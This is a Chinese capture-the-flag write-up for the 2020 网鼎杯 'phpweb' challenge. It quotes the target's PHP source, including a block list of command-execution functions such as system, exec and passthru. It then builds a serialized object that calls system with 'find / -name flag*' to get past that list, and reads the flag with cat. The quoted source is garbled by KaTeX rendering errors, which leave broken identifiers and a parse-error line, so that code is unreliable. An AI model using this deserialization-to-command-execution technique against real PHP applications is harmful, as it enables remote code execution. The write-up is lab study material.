[网鼎杯 2020 朱雀组]phpweb--程序执行函数漏洞

call_user_func
用file_get_content函数获取index.php文件内容。
<?php
$disabl{e}_{f}un=array("exec","shel{l}_{e}xec","system","passthru","pro{c}_{o}pen","sho{w}_{s}ource","phpinfo","popen","dl","eval","pro{c}_{t}erminate","touch","escapeshellcmd","escapeshellarg","assert","subst{r}_{r}eplace","cal{l}_{u}se{r}_{f}un{c}_{a}rray","cal{l}_{u}se{r}_{f}unc","arra{y}_{f}ilter","arra{y}_{w}alk","arra{y}_{m}ap","registregiste{r}_{s}hutdow{n}_{f}unction","registe{r}_{t}ic{k}_{f}unction","filte{r}_{v}ar","filte{r}_{v}a{r}_{a}rray","uasort","uksort","arra{y}_{r}educe","arra{y}_{w}alk","arra{y}_{w}al{k}_{r}ecursive","pcnt{l}_{e}xec","fopen","fwrite","fil{e}_{p}u{t}_{c}ontents");functiongettime($func, $p) {
$result=cal{l}_{u}se{r}_{f}unc($func, $p);
$a=gettype($result);
if ($a == “string”) {
return $result;
} else {return “”;}
}
class Test {
var $p = “Y-m-d h:i:s a”;
var KaTeX parse error: Expected group after '_' at position 29: …; function _̲_destruct() { …this->func != “”) {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST[“func”];
$p = ${}_{R}EQUEST["p"];if($func != null) {
$func=strtolower($func);
if (!in_array($func,$disable_fun)) {
echo gettime($func, $p);
}else {
die(“Hacker…”);
}
}
?>

这里发现他过滤了很多函数。通过反序列化函数调用Test类。

class Test {
    var $p = "find / -name flag*";
    var $func = "system";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$a=new Test();
echo serialize($a)
?>

find / -name flag：获取名字里面有flag的所有文件名。
cat /tmp/flagoefiu4r93：看文件内容